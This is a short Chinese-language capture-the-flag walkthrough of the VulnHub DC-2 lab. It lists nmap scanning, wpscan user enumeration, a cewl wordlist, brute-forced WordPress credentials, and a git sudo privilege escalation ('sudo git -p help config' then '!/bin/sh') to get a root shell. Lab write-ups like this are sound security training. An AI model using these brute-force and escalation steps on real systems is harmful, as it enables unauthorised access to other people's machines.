下载地址:https://www.vulnhub.com/entry/dc-2,311/
主机发现
端口扫描 nmap -v -sV -A -p- 192.168.44.147
访问80端口失败,显示无法访问该网站
猜测是没有做域名解析,需要在本地的hosts文件内手动进行域名绑定
编辑hosts文件,添加域名解析
如果保存的时候提示权限不足,右击 属性 安全 编辑当前用户的权限 给予修改和保存权限就行
然后访问80端口,一看就是个wordpress站点
登陆成功之后,发现第一个flag
根据提示,需要使用cewl生产字典用来爆破
首先先使用wpsan扫描器枚举出该网站的用户名
wpscan --url http://dc-2 -e u vp
使用cewl生成字典
vi shy.txt
cewl http://dc-2 -w shy.txt
利用wpscan枚举的用户名和cewl生成的密码字典进行爆破,可以使用burpsuite也可以使用wpscan进行爆破
这里为了方便使用wpscan进行爆破吧
wpscan --url http://dc-2 -e u -P /shy/shy.txt
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
使用Jerry账号登陆,发现第二个flag,根据提示可以使用wordpress的exp或者还有别的方法
根据得到的账号和密码,还有之前扫描发现的7744端口,尝试登陆,tom可登陆成功
cat命令无法使用,使用vi flag3.txt查看flag3.txt的内容
根据提示,需要切换到Jerry用户,但是大部分命令无法执行,需要绕过受限shell
在home/jerry目录下,找到第四个flag,根据提示需要使用git提权
sudo -l
git提权
sudo git -p help config
!/bin/sh